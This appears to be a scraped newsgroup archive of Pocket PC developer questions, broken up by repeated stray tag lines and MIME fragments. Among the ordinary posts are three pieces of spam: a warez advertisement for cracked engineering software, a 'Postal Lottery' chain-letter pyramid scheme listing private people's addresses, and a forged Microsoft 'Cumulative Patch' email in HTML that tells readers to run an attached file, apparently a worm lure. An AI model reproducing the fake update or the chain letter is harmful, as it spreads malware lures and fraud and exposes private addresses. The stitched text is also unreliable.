BxcFCjgwgQSJCQcWCggIADs= --hhwrmulcdxuzgw-- --riyezopzmqqxvvl Content-Type: application/x-compressed; name="saxov.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment --riyezopzmqqxvvl-- Tag: Constants used with the INF file. Tag: 65500
      • 12
        • LandScape Mode for PocketPC I was wondering if there is a simple way to allow my pocket pc application to display a gridbox/winform in "landscape" mode so that I can turn the entire pocket pc on its side in order to view the data. I downloaded a cool app that plays golf and utilizes this concept of rotating the entire screen to landscape mode, so I know it's possible... Any suggestions would be appreciated! Thanks! Tag: Constants used with the INF file. Tag: 65499
      • 13
        • very basic SQL CE question I'm just looking at creatintg a simple PPC database (as opposed to text files I currently use) Can I download the SQL CE and use in with evc3/4 without any extras ? Or is my only choice the 'properties' database methods talked about in some books TIA Andrew Kennard Tag: Constants used with the INF file. Tag: 65498
      • 14
        • http://www.cwarez.tk - the best software is hire! http://www.cwarez.tk =>Cracks and Warez: Chief Architect 9.0, XSteel 8.2, Ansys 7.0/7.1, Beantly, Femap, Flac 3D,Sacs 5.1, Staad Pro 2003, Loockout 5.0, Arcgis 8.3, Archicad 8.0, AutoCad 2004, Beantly,Cosmos Work 2003, Solid Works 2003, BoCAD 3D,Cosmos Work 2003, AutoDesk Architectural DeskTop 2004, AutoDesk revit 5.0/5.1, AutoDesk Inventor 7.0 and others To see full list, visit http://www.cwarez.tk --- a new upgrated list of cracked software, about 150 new names. All are full version including all modules and full documents. Also crack and/or license file and step-by-step install guide are included in the CDs. when you install, you just follow the step-by-step install guide we supplied, its very easy . If you are interested in any programs in our list, just email to us please, we will reply . Our program list updated once a month. If the program you are looking for is not listed here, you can tell us, maybe we can find it for you. We provide qualitative performance of breaking for well protected expensive programs and programs with lower degree of protection. Cost of the service rendered by us is influenced with a degree and a kind of protection of the software. For getting the additional information, view our software list and order of the programs mail us E-mail: e-mail: cwarez@tut.by or cwarez@mail.ru : Autodesk Map 2004 : BENTLEY MicroStation GeoGraphics v8.00 04 03 : CAEFEM v6.0 : CIMATRON.IT.V13 : FLUENT.ICEPAK.V4.0 : 3D Garden Composer : 3D Studio Max 5.1 : 3D Home Architect 5.0 : ABAQUS V6.3.3 © HKS : Absoft.Pro.Fortran.v7.5 : Accel PCAD 2003 : Adina 7.42 : AEA.Technology.HyproTech.HYSYS.v.3.0 : AEC.CADPIPE.2002.Building.Services_v6.6.for.AutoCAD : AEC.CADPIPE.2002.Commercial.Pipe_v6.6.for.AutoCAD : AEC.CADPIPE.2002.HVAC_v6.6.for.AutoCAD : AEC.CADPIPE.2002.Industrial_v6.6.for.AutoCAD : ALGOR InCAD Designer : Algor.InCAD Designer Autodesk Inventor v13.4 : ALGOR.InCAD Designer Mechanical Desktop v13 : ALGOR.InCAD Designer SolidEdge v13 : ANSOFT HFSS v9.0 : ANSOFT SIMPLORER V6.0 : ANSYS 7.1 Workbench Environment : ANSYS DesignSpace v7.1 : ANSYS ICEM CFD : ANSYS VISTA : Applied.Flow.Technology.Arrow.v2.0.2002.02.22 : Applied.Flow.Technology.Fathom.v5.0.2002.01.07 : Applied.Flow.Technology.Fathom.v5.0.2002.02.22 : Applied.Flow.Technology.Mercury.v5.0.2002.02.01 : ArcGIS 8.2 : ArchiCAD 8 : Archicad 8.0 r2 : Architecture.for.TriForma : ArCon 6.5 + : ArcView 3.3 2002 : ArcView 8.2 : ARTICAD Pro 10 : Ashrae Handbook : AspenTech.Aspen.Engineering.Suite.v10.2.1 : AutoCAD 2004 : AutoCAD LT 2004 : AutoCAD Mechanical 2004 : Autodesk Architectural Desktop 2004 : Autodesk Architectural Studio 3 : Autodesk Building Systems 3 : Autodesk Civil Design 2004 : Autodesk Civil Series 3 : Autodesk Envision 8 : Autodesk Field Survey : Autodesk Inventor Series 6 : Autodesk Land Desktop 2004 : Autodesk Map Series 2004 : Autodesk MapGuide 6.3 : Autodesk MDT 6.0 with PowerPack : Autodesk Raster Design 2004 : Autodesk Revit 5.0 : Autodesk Survey 2004 : Autodesk Symbols 2000 : Autodesk VIZ 4 : Autodesk.AutoCAD.Architectural.Desktop R3.3 : Autodesk.Mechanical Desktop V6 : AxisVm 5 r 6 : Bentey MicroStation GeoParcel v07.02 04 05 : BENTLEY INROADS V8.3 : Bentley PlantSpace Design Series v08.00 02 12 : Bentley.MicroStation.v8.00.02.20 : BOSS MapViewer 4.0 : BOSS Surfer 8.0 : CADCAM-E.IGES-PRO.v2.0 : Cadds v5IR12 : Cadence.Allegro.v13.6 : Cadence.Allegro.v14.2 : CADENCE.PCB.DESIGN.STUDIO.V14.2 : CADENCE.SPECCTRA.ROUTER.V10.2 : CADFIX_V5.0 : CADPIPE 5.4 COM & HVAC : CadSoft.EAGLE v4.03 : CAMCAD PCB v3.30.1 : Canvas 7.02 : Carrier (HAP) 99-2000 : Catia v5R10 : CATIA v5R10 P3 : Chief.Architect 9.0 : Cimatron E : Cimatron v12.2 : Civilcad 5.5 : CNC.MasterCAM V9.1 : ColdFusion MX Server Professional : ComfortAir_HVAC : Cosmos Floworks 2003 : COSMOS Motion 2003 : Cosmos Works 2003 : COSMOS/DesignSTAR V3.0.350 : COSMOS/EDGE V4 : COSMOS/M V2.6 : CSI.SAFE v8.0 : DEFORM 3D v 4.03 : DELCAM.ARTCAM PRO V5.0 : DELCAM.COPYCAD V3.5 : DELCAM.POWER MILL V4.0 : DELCAM.POWERSHAPE 2003 : DELCAM.POWERSHAPE.V4.102 : Derive 5 : EdgeCAM.v6.75 : EES(Engineering Equation Solver) : Electronic Workbench 5.12 Pro : Erdas.Imagine V8.5 : ErMapper.v6.1 : ESDL Manager : ESRD.STRESSCHECK.V6.1.24 : ESRI.ARCINFO.V8.1.2 : ESRI.ARCVIEW_3.3 : ESRI.MAPOBJECTS V2.2 : ETABS 8.22 : ETABS Nonlinear v8.15 : FLAC 2D & 3D v4.0 : Floorplan.3D.v.8.0 : Floorplan.3D.v8.0 : FLUENT V6.1 PROPER © FLUENT INC : FLUENT.FIDAP.V8 : FLUENT.GAMBIT V2 : GeoPack suite 2001 : Gerber Technologies : GibbsCAM 2002 v11 : GT_STRUDL V2.6 : Heating system calculator(Heat) : HKS.ABAQUS V6.2-1 : HKS.ABAQUS V6.2-2 : HyperChem 7.0 : IntelliCAD 4 Professional : Intergraph bridge Selecd cad 8 : Intergraph InRoad Selecd cad 8 : Intergraph InRoad Survey 7.01 : Intergraph InRoads Bridge v07.02 : Intergraph InRoads Construction v07.02 : Intergraph Map Publisher v06.01 : Intergraph.InSewer.07.01 : Intrasoft MXROAD : Jewelcad 5.0 : Lectra 4.0 : Limdep v8 : Liscad 6.1 : MAGMAsoft package : MapInfo 7.0 : Maple 8 : MASTERCAM 9.1 : Mathcad PROFESSIONAL V2001i : Mathematica 4 : MATHLAB 6.5 (2CD) : Metastock v8 : Microsoft Nastran V5.1 for win : Microsoft Visio Pro v2002 : Microsoft Windows 2000 Advanced Server with SP3 : Microsoft Windows 2000 DataCenter SP3 : Microsoft Windows 2003 Corporate Server : Microsoft Windows XP Corporate Edition with SP1 : Microsoft Windows XP Professional : MicroStation 8 : MicroStation TriForma : Microstran v7.0 : MICROSURVEY CAD2002 SP1 : MiniCAD 7.0 : MINITAB 13.2 2002 : Ms Money 2003 : Ms Project 2002 : MSC Marc 2001 : MSC.Dytran2002 : MSC.GS-MesherV2001R3 : MSC.NASTRAN V2001 : MSC.NASTRAN V4.5 for windows : MSC.Patran 2003 © MSC.Software : MSC.SUPERFORGE V2002 : MSC.VISUAL NASTRAN V2002 : MSC.Working Model 3D 4 : MSC.Working Model 4D 6.1 : MSDN UNIVERSAL 7.0 : MultiFrame 2D : MultiFrame 3D : MultiFrame 4D v7.5 : Multisim 2001 : Nemetschek.VectorWorks.Architect v10 : Oasys Geo suite v17 : Oracle 9i Database Enterprise Edition : ORCAD 9.2 : ORCAD UNISON SUITE 2002 : PARSCALE v4.1 : Pca mat 5.10 : Peachtree Complete Accounting 2003 : Piping.Systems.FluidFlow.v2.25 : Plani Millenium II : POWERCAD.PRO.V5.0.SP2 : Primavera Expedition 7.5 : Primavera Project Planner 3.1 : Prokon 1.8 : ProMODEL 2001 : ProSteel 3D : Protel 2002 : PROTEL 99 +SERVICE PACK 6 : Protel Altium DXP V7.0 : Quickbooks Pro 2002 : Radimpex Armcad 2000 2.3.2 : REBIS AUTOPLANT : RISA 3D 4.5 : Robohelp Enterprise 2002 R2 : ROBOT MILLENIUM 15.5 : Robot.Millenium v16.5 : Rockworks 2003 : RSView32 : SAFE V7.02 : SAP2000 Nonlinear v8.15 : SAS v8.2 : SECTION BUILDER 8.02 : Sinda Fluint v4.5 : Soda 3.5 : Solarwinds Engineers Edition 2002 5.0 : SolidWorks v2003 SP2.1 : S-PLUS 2000 : SPSS 11 : Staad III 22 : STAAD Pro V2003 : Statistica v6 : Surfcam 2002 : SYNOPSYS STAR-HSPICE V2003.03 SP1 : Synopsys.Core.Synthesis.v2001.08-sp2 : SYNOPSYS.FPGA.COMPILER.II.V3.7.0 : Synopsys.FPGA_Compiler.v3.6.0.6613 : Synopsys.FPGA_Express.v3.6.1.6817 : Synopsys.MemPro.v2001.11.for.NT : SYNOPSYS.VCS.V6.0.1.WINNT2K : SYNOPSYS.VCSi.V6.0.1.WINNT2K : Tebis CAD CAM v3.1 R12 : Thermal Desktop v4.5 : TNTmips v 6.8 : TurboCAD.Professional v9.0 : Type3 4.5 : UNIGRAPHICS NX 1.0.1 : UNIGRAPHICS V19 : VectorWorks 10.0 : Vectorworks Architect v 9.52 OS9 : Visual Studio.NET Enterprise Architect : Windows Server 2003 Enterprise Edition : WoodWorks Connections & Shearwalls 2000 : X-Steel v.8.1 : X-Steel v.8.2 e-mail: cwarez@tut.by or cwarez@mail.ru To see full list, visit http://www.cwarez.tk --- a new upgrated list of cracked software -- crackattack - Unregistered User ------------------------------------------------------------------------ View this thread: http://www.soft-forum.com/forums/showthread.php?threadid=1041742 Tag: Constants used with the INF file. Tag: 65495
      • 15
        • RTC/RTP Hi everyone, Where is the real time protocol in VB.net CF? regards Tag: Constants used with the INF file. Tag: 65493
      • 16
        • Heap fragmentation results in memory leaks? Hi, I'm using PPC2002 version 3.0.11171 on iPaq, My app does many small allocations, then frees them and reallocates, I've written a testing program for monitoring the heap's state: void* pA = new BYTE[10]; void* pB = new BYTE[10]; void* pC = new BYTE[10]; Heap's state: 00090000 18 Fixed 00090018 18 Fixed 00090030 18 Fixed ... 000921E8 E18 Free Then I called delete() and again pB = new BYTE[10]; Heap's state: 00090000 18 Fixed 00090018 18 Free 00090030 18 Fixed ... 000921E8 18 Fixed 00092200 E00 Free I can see that the allocation was done not in the 'freed up' place, but in another place, Is this behavior might lead to leaks, as the heap might grow? Thanks, Ziv Tag: Constants used with the INF file. Tag: 65492
      • 17
        • Determine connected device. A question about ActiveSync and the registry Is it possible by reading from the registry to determine if there currently is a connected device. And if so also find out its DeviceID for its partnership. The only reg-value I have found is "Last Device", but it is not updated until the ActiveSync manager is shut down. Thanks, /Jonas Tag: Constants used with the INF file. Tag: 65491
      • 18
        • any graph library for Pocket PC? I want a graph which can draw data array, zoom in/out, etc. Is there any graph library exsisted for Pocket PC? Tag: Constants used with the INF file. Tag: 65490
      • 19
        • Can't set single precision font size. Hi, I am trying to set a label font size to 8.25 but the objects gets only 8. I tried from 8 to 9 stepping with 0.01 and nothing! (VS.NET 2003, VB Smart Device Application) Can you help me please. Thanks, Rafael Tag: Constants used with the INF file. Tag: 65489
      • 20
        • Postal Lottery: Turn $6.00 Into 60.000 In 90 Days Postal Lottery: Turn $6 into $60,000 in 90 days,=20 GUARANTEED I found this in a news group and decided to try it. A=20 little while back, I was browsing through newsgroups, just like you=20 are now and came across a message just like this that said you could=20 make thousands of dollars within weeks with only an initial=20 investment of $6.00!!!=20 So I thought yeah right, this must be a scam!!! But like=20 most of us, I was curious, so I kept reading. Anyway, it said that you=20 send $1.00 to each of the 6 names and addresses stated in the message.=20 You then place your own name and address at the bottom of the list=20 at #6 and post the message in at least 200 news groups. (There are=20 thousands to choose from). No catch, that was it. So after thinking it over, and talking to a few people=20 first. I thought about trying it. I figured, what have I got to=20 lose except 6 stamps and $6.00, right? So I invested the measly=20 $6.00!!! Guess what? Within 7 days I started getting money in the mail!!! I=20 was shocked!!! I figured it would end soon, but the money just kept=20 coming in!!! In my first week, I had made about $25.00. By the end of the=20 second week, I had made a total of over $1,000.00!!! In the third=20 week, I had over $10,000.00 and it is still growing!!! This is now my=20 fourth week and I have made a total of just over $42,000.00 and it is still=20 coming in rapidly!!! It's certainly worth $6.00 and 6 stamps!!! I=20 have spent more than that on the lottery!!!=20 Let me tell you how this works and most importantly, why=20 it works!!!=20 Also, make sure you print a copy of this message now. So=20 you can get the information off of it as you need it. I promise you=20 that if you follow the directions exactly, that you will start making=20 more money than you thought possible by doing something so easy!!!=20 Suggestion: Read this entire message carefully!!! (Print=20 it out or download it.) Follow the simple directions and watch the=20 money come in!!! It's easy!!! It's legal!!! Your investment is only=20 $6.00 (plus postage).=20 IMPORTANT: This is not a rip-off!!! It is not=20 illegal!!! ? It is almost entirely risk free and it really works!!! If all=20 of the following instructions are adhered to, you will receive=20 extraordinary dividends!!!=20 Please note: Follow these directions EXACTLY, and=20 $60,000.00 or more can be yours in 20 to 90 days!!! This program remains=20 successful because of the honesty and the integrity of the=20 participants!!! Please continue its success by carefully adhering to the=20 instructions.=20 You will now become part of the mail order business. In=20 this business your product is not solid or tangible, it is a service.=20 You are in the business of developing mailing lists. Many large=20 corporations are happy to pay big bucks for quality lists. However, the=20 money made from a mailing list is secondary to the income which is made=20 from people like you and me asking to be included on your mailing=20 list!!!=20 Here are the 4 easy steps to success:- Step 1:- Get 6 separate pieces of paper and write the=20 following on each piece of paper.=20 PLEASE PUT ME ON YOUR MAILING LIST =20 Now get 6 U.S. dollar bills and place ONE inside each of=20 the 6 pieces of paper so the bills will not be seen through the=20 envelopes (to prevent mail theft). Next, place one paper in each of the=20 6 envelopes and seal them, you should now have 6 sealed envelopes.=20 Each with a piece of paper stating the above phrase, your name and=20 address, and a $1.00 bill.=20 THIS IS ABSOLUTELY LEGAL!!! YOU ARE REQUESTING A=20 LEGITIMATE SERVICE AND YOU ARE PAYING FOR IT!!!=20 Like most of us, I was a little skeptical and a little=20 worried about the legal aspect of it all. So I checked it out with the=20 U.S. Postal Service and they confirmed that it is indeed legal!!! Mail the 6 envelopes to the following addresses:- S. A. Blair 14601 Portland Ave #219 Burnsville, MN 55306=20 D. Kumar Room 2.36 Burkhardt House Oxford Place, Victoria Park M14 5RR Manchester ENGLAND T. Perce 11505 Headley Avenue Cleveland, Oh 44111 T. Beckers Rijksweg 46 6267AH Cadier en Keer The Netherlands J. Eddolls 144 Pursey Drive Bradley Stoke Bristol BS32 8DP United Kingdom W.Scott Moniz 2460 Aumakua Pearl City HI 96782 Step 2:- Now take the #1 name off the list that you see=20 above, move the other names up (6 becomes 5, 5 becomes 4, etc.) and=20 add your name as number 6 on the list.=20 Step 3:- Change anything you need to, but try to keep=20 this message as close to what you see as possible. Now, post your amended=20 message to at least 200 news groups. I think there are close to=20 24,000 groups!!! All you need is 200, but remember, the more you post, the=20 more money you make!!! This is perfectly legal!! If you have any=20 doubts, refer to Title18 Sec. 1302 & 1341 of the postal lottery laws. Keep=20 a copy of these steps for yourself and whenever you need money, you=20 can use it again. Please remember that this program remains successful=20 because of the honesty and the integrity of the participants and by=20 their carefully adhering to the directions!!!=20 Look at it this way. If you are of integrity, the program=20 will continue and the money that so many others have received=20 will come your way!!!=20 Note: - You may want to retain every name and address=20 sent to you, either on your computer or hard copy and keep the notes=20 people send you. This verifies that you are truly providing a=20 service. Also, it might be a good Idea to wrap the $1 bills in dark paper=20 to reduce the risk of mail theft.=20 So, as each post is downloaded and the directions=20 carefully followed, six members will be reimbursed for their participation as=20 a list developer with one dollar each. Your name will move up=20 the list geometrically so that when your name reaches the #1=20 position, you will be receiving thousands of dollars in cash!!! What an=20 opportunity for only $6.00!!! ($1.00 for each of the first six people=20 listed above). Send it now, add your own name to the list and your in=20 business!!! DIRECTIONS FOR HOW TO POST TO A NEWS GROUP!!! Step 1:- You do not need to re-type this entire message=20 to do your own posting. Simply put your cursor at the beginning of this=20 message and drag your cursor to the bottom of this message and select=20 copy from the edit menu. This will copy the entire message into the=20 computer memory. Step 2:- Open a blank note pad file and place your cursor=20 at the top of the blank page. From the edit menu select paste. This=20 will paste a copy of the message into notepad so that you can add your=20 name to the list. Step 3:- Save your new notepad file as a txt file. If you=20 want to do your posting in a different setting, you'll always have=20 this file to go back to. Step 4:- Use Netscape or Internet Explorer and try=20 searching for various news groups (on-line forums, message boards, chat=20 sites, discussions, etc.)=20 Step 5:- Visit these message boards and post this message=20 as a new message by highlighting the text of this message from=20 your notepad and selecting paste from the edit menu. Fill in the subject,=20 this will be the header that everybody sees as they scroll through the=20 list of postings in a particular group. Click the post message=20 button. You've done your first one! Congratulations!!! All you have to=20 do is jump to different news groups and post away, after you get the=20 hang of it, it will take about 30 seconds for each news group! REMEMBER, THE MORE NEWS GROUPS YOU POST IN, THE MORE=20 MONEY YOU WILL MAKE!!! (But you have to post a minimum of 200). That's it!!! You will begin receiving money from around=20 the world within days!!! You may eventually want to rent a P.O. Box=20 due to the large amount of mail you will receive. If you wish to=20 stay anonymous, you can invent a name to use, as long as the postman will=20 deliver it. JUST MAKE SURE ALL THE ADDRESSES ARE CORRECT!!!=20 Now the why part. Out of 200 postings, say you receive=20 only 5 replies (a very low example). So then you made $5.00 with your=20 name at #6 on the letter. Now, each of the 5 persons who sent you $1.00=20 make the minimum 200 postings, each with your name at #5 and only=20 5 persons respond to each of the original 5, that is another $25.00=20 for you. Now those 25 each make 200 MINIMUM posts with your name at #4=20 and only 5 replies each, you will bring in an additional $125.00!!!=20 Now, those 125 persons turn around and post the minimum 200 with=20 your name at #3 and only receive 5 replies each, you will make an=20 additional $625.00!!! OK, now here is the fun part, each of those=20 625 persons post a minimum 200 messages with your name at #2 and they=20 each only receive 5 replies, that just made you $3,125.00!!! Those 3,125 persons will all=20 deliver this message to 200 news groups. If just 5 more reply you will=20 receive $15,625.00!!! All with an original investment of only=20 $6.00!!! Amazing isn't it!!!! When your name is no longer on the list, you=20 just take the latest posting in the news groups and send out=20 another $6.00 to the names on the list, putting your name at number 6=20 again. You must realize that thousands of people all over the=20 world are joining the internet and reading these messages every=20 day!!! Just like you are now!!! So, can you afford $6.00 and see if it=20 really works? I'm glad I did!!! People have said, "what if the plan is=20 played out and no one sends you the money?" So what!!! What are the=20 chances of that happening, when there are tons of new honest users=20 and new honest people who are joining the internet and news groups=20 everyday and are willing to give it a try? Estimates are at 20,000 to=20 50,000 new users, every day!!! REMEMBER PLAY HONESTLY AND FAIRLY AND THIS WILL REALLY=20 WORK!!! -- Comments/Feedback (please post your=20 feedback/experiences here) -- Not bad for 1 hr's work....made me around $5320 in=20 roughly 35 days Anthony M - TX Hello, I rcvd 269 bucks in the post in 2 weeks. Dan Miami - FL I had to wait around 10 days before I had any results -=20 $13,450 as of 3rd Jan 2003 to date (14th Feb 2003).Am gonna re-post it=20 again for more money!! Del from Alberta - Canada Only received around =A3588 in the post the last 2 months=20 since I started the program but I'd posted to approx. 100=20 newsgroups. James P - Manchester, UK Cool....didn't expect much out of this "scam" initially=20 but I have pay my credit card bill Mustafa - Jordan For $6,I made $246 in 2 weeks ROMEO2326 - Little Rock, AR -US of A=20 Hey, just droppin a line to say that after posting to=20 well over 820 newsgroups on google and my ISP newsgroup server over a=20 period of 4 1/2 months ,Ive raked in $54280 . Mucho dinero baby!!!! =20 Peace. Drew Dallas - TX Tag: Constants used with the INF file. Tag: 65487
      • 21
        • Try these update --lpnlnlwqzk Content-Type: multipart/related; boundary="quniohtanxj"; type="multipart/alternative" --quniohtanxj Content-Type: multipart/alternative; boundary="yahkxwcamcrjyw" --yahkxwcamcrjyw Content-Type: text/plain Content-Transfer-Encoding: quoted-printable Microsoft User this is the latest version of security update, the "October 2003, Cumulative Patch" update which eliminates all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express. Install now to continue keeping your computer secure. This update includes the functionality = of all previously released patches. System requirements: Windows 95/98/Me/2000/NT/XP This update applies to: - MS Internet Explorer, version 4.01 and later - MS Outlook, version 8.00 and later - MS Outlook Express, version 4.01 and later Recommendation: Customers should install the patch = at the earliest opportunity. How to install: Run attached file. Choose Yes on displayed dialog box. How to use: You don't need to do anything after installing this item. Microsoft Product Support Services and Knowledge Base articles = can be found on the Microsoft Technical Support web site. http://support.microsoft.com/ For security-related information about Microsoft products, please = visit the Microsoft Security Advisor web site http://www.microsoft.com/security/ Thank you for using Microsoft products. Please do not reply to this message. It was sent from an unmonitored e-mail address and we are unable = to respond to any replies. ---------------------------------------------- The names of the actual companies and products mentioned = herein are the trademarks of their respective owners. Copyright 2003 Microsoft Corporation. --yahkxwcamcrjyw Content-Type: text/html Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> <style type=3D'text/css'>.navtext{color:#ffffff;text-decoration:none} </style> </HEAD> <BODY BGCOLOR=3D"White" TEXT=3D"Black"> <BASEFONT SIZE=3D"2" face=3D"verdana,arial"> <TABLE WIDTH=3D"600" HEIGHT=3D"40" BGCOLOR=3D"#1478EB"> <TR height=3D"20"> <TD ALIGN=3D"left" VALIGN=3D"TOP" WIDTH=3D"400" ROWSPAN=3D"2">&nbsp; <FONT FACE=3D"sans-serif" SIZE=3D"5"><I><B> <A class=3D'navtext' HREF=3D"http://www.microsoft.com/" TITLE=3D"Microsoft Home Site" target=3D"_top">Microsoft</A> </B></I></FONT> </TD> <TD ALIGN=3D"right" VALIGN=3D"MIDDLE" BGCOLOR=3D"Black" NOWRAP> <FONT color=3D"#ffffff" size=3D1>&nbsp; <A class=3D'navtext' href=3D'http://www.microsoft.com/catalog/' = target=3D"_top">All Products</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://support.microsoft.com/' = target=3D"_top">Support</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://search.microsoft.com/' = target=3D"_top">Search</A>&nbsp;|&nbsp; <A class=3D'navtext' href=3D'http://www.microsoft.com/' target=3D_top> Microsoft.com Guide</A>&nbsp; </FONT> </TD> </TR> <TR> <TD ALIGN=3D"right" VALIGN=3D"BOTTOM" NOWRAP> <FONT FACE=3D"Verdana, Arial" SIZE=3D1><B> <A class=3D'navtext' HREF=3D'http://www.microsoft.com/' TARGET=3D" top"> Microsoft Home</A>&nbsp;&nbsp;</B> </FONT> </TD> </TR> </TABLE> &nbsp;<IMG SRC=3D"cid:juvipue" BORDER=3D"0"><BR><BR> <TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2"> Microsoft User<BR><BR> this is the latest version of security update, the "October 2003, Cumulative Patch" update which eliminates all known security vulnerabilities affecting MS Internet Explorer, MS Outlook and MS Outlook Express. Install now to continue keeping your computer secure. This update includes the functionality = of all previously released patches. </FONT></TD></TR> </TABLE> <BR><BR> <TABLE BORDER=3D"1" CELLSPACING=3D"1" CELLPADDING=3D"3" WIDTH=3D"600"> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:qegusxo" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;System requirements</B> </FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Windows 95/98/Me/2000/NT/XP</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:qegusxo" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;This update applies to</B> </FONT></TD><TD NOWRAP> <FONT SIZE=3D"1"> MS Internet Explorer, version 4.01 and later<BR> MS Outlook, version 8.00 and later<BR> MS Outlook Express, version 4.01 and later </FONT> </TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:qegusxo" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;Recommendation</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Customers should install the patch = at the earliest opportunity.</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:qegusxo" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to install</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">Run attached file. = Choose Yes on displayed dialog box.</FONT></TD> </TR> <TR VALIGN=3D"TOP"> <TD NOWRAP><FONT SIZE=3D"1"><B><IMG SRC=3D"cid:qegusxo" = ALIGN=3D"absmiddle" BORDER=3D"0">&nbsp;How to use</B></FONT></TD> <TD NOWRAP><FONT SIZE=3D"1">You don't need to do = anything after installing this item.</FONT></TD> </TR> </TABLE> <BR> <TABLE WIDTH=3D"600"><TR><TD><FONT SIZE=3D"2"> Microsoft Product Support Services and Knowledge Base articles can be found on the <A HREF=3D"http://support.microsoft.com/" = TARGET=3D"_top">Microsoft Technical Support</A> web site. = For security-related information about Microsoft products, please = visit the <A HREF=3D"http://www.microsoft.com/security" TARGET=3D"_top"> Microsoft Security Advisor</A> web site, = or <A HREF=3D"http://www.microsoft.com/contactus/contactus.asp" = TARGET=3D"_top">Contact Us.</A> <BR><BR> Thank you for using Microsoft products.<BR><BR></FONT> <FONT SIZE=3D"1">Please do not reply to this message. = It was sent from an unmonitored e-mail address and we are unable = to respond to any replies.<BR></FONT> <HR COLOR=3D"Silver" SIZE=3D"1" WIDTH=3D"100%"> <FONT SIZE=3D"1" COLOR=3D"Gray">The names of the actual companies and = products mentioned herein are the trademarks = of their respective owners.</FONT> </TD></TR></TABLE> <BR> <TABLE WIDTH=3D"600" HEIGHT=3D"45" BGCOLOR=3D"#1478EB"> <TR VALIGN=3D"TOP"> <TD WIDTH=3D"5"></TD> <TD> <FONT COLOR=3D"#FFFFFF" SIZE=3D"1"><B> <A class=3D'navtext' HREF=3D"http://www.microsoft.com/= contactus/contactus.asp" TARGET=3D"_top">Contact Us</A> &nbsp;|&nbsp; <A class=3D'navtext' HREF=3D"http://www.microsoft.com/legal/" = TARGET=3D"_top">Legal</A> &nbsp;|&nbsp; <A class=3D'navtext' HREF=3D"https://www.truste.org/validate/605" = TARGET=3D"_top" TITLE=3D"TRUSTe - Click to Verify">TRUSTe</A> </FONT></B> </TD> </TR> <TR VALIGN=3D"MIDDLE"> <TD WIDTH=3D"5"></TD> <TD> <FONT COLOR=3D"#FFFFFF" SIZE=3D"1"> &copy;2003 Microsoft Corporation. All rights reserved. <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/cpyright.htm" TARGET=3D"_top">Terms of Use</A> &nbsp;|&nbsp; <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= info/privacy.htm" TARGET=3D"_top"> Privacy Statement</A>&nbsp;|&nbsp; <A STYLE=3D"color:#FFFFFF;" HREF=3D"http://www.microsoft.com/= enable/" TARGET=3D"_top">Accessibility</A> </FONT> </TD> </TR> </TABLE> </BODY> </HTML> --yahkxwcamcrjyw-- --quniohtanxj Content-Type: image/gif Content-Transfer-Encoding: base64 Content-ID: <juvipue> R0lGODlhaAA7APcAAP///+rp6puSp6GZrDUjUUc6Zn53mFJMdbGvvVtXh2xre8bF1x8cU4yLprOy zIGArlZWu25ux319xWpqnnNzppaWy46OvKKizZqavLa2176+283N5sfH34uLmpKSoNvb7c7O3L29 yqOjrtTU4crK1Nvb5erq9O/v+O7u99PT2sbGzePj6vLy99jY3Pv7/vb2+fn5++/v8Kqr0oWHuNbX 55SVoszN28vM2pGUr7S1vqqtv52frOPl8CQvaquz2Ojp7pmn3Ozu83OPzmmT6F1/xo6Voh9p2C5z 3EWC31mS40Zxr4uw6LXN8iZkuXmn55q97PH2/Yir1rbL5iVTh3Oj2cvX5Pv9/+/w8QF8606h62Wk 3n+dubnY9abB2c7n/83h9Nji6weK+CGJ4Vim6WyKpKWssgFyyAaV/0Km8Gyx6HW57FJxicDP2+Tt 9Pj8/wOa/wmL5wqd/w6V8heb91e5+mS9+VmLr4vD6qvc/b/j/Mbn/sTi9rvX6szq/tPt/9ju/dzx /+n2/+74//P6/+3w8hOh/xOW6yCm/iuu/zWv/0m4/XTH/IXK95TP9qPV9bfi/tDn9tfp9OP0/93r 9L3Izy6Vzj22/lrC/mfG/JvJ5JGntAyd6IbX/3zD6GzP/3jV/2uoxHqbqujv8g6MvJTj/2HF5pXV 606zz6Hp/63v/7j1/8Ps88b8/rbj5RKOkE2wr3OGhoKGhv7///Dx8V2alqvm4Zni1YPRvx5uVwyO X0q2hLTvw8X10gx2H4PXkkuoV5zkoQeADZu7mmzIVEO7HIXbaGfLMPz8+97d2/Px7v///+bl5eHg 4P7+/v39/fT09PLy8u7u7gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAaAA7AAAI/gCVCRxI sKDBgwgTKlzIsKHDhxAjKgwiqs2kSJEgQfqyp2PHLxoxTmojSpTEkyglBrGYcU+el3n09PEDSFKg mzclAfLTRw/MPV4gjTSZsmhRURchuXwUs88fSYIGubEiqyqAq1gBNLPiRlCgPz197tE4MojRswuD JHX5UiagQILcNMtKl26zu3etuBgUaKcePXv0QIo0iSjaw8raROKYh6nbuFbmVpVlpbKby4Mya858 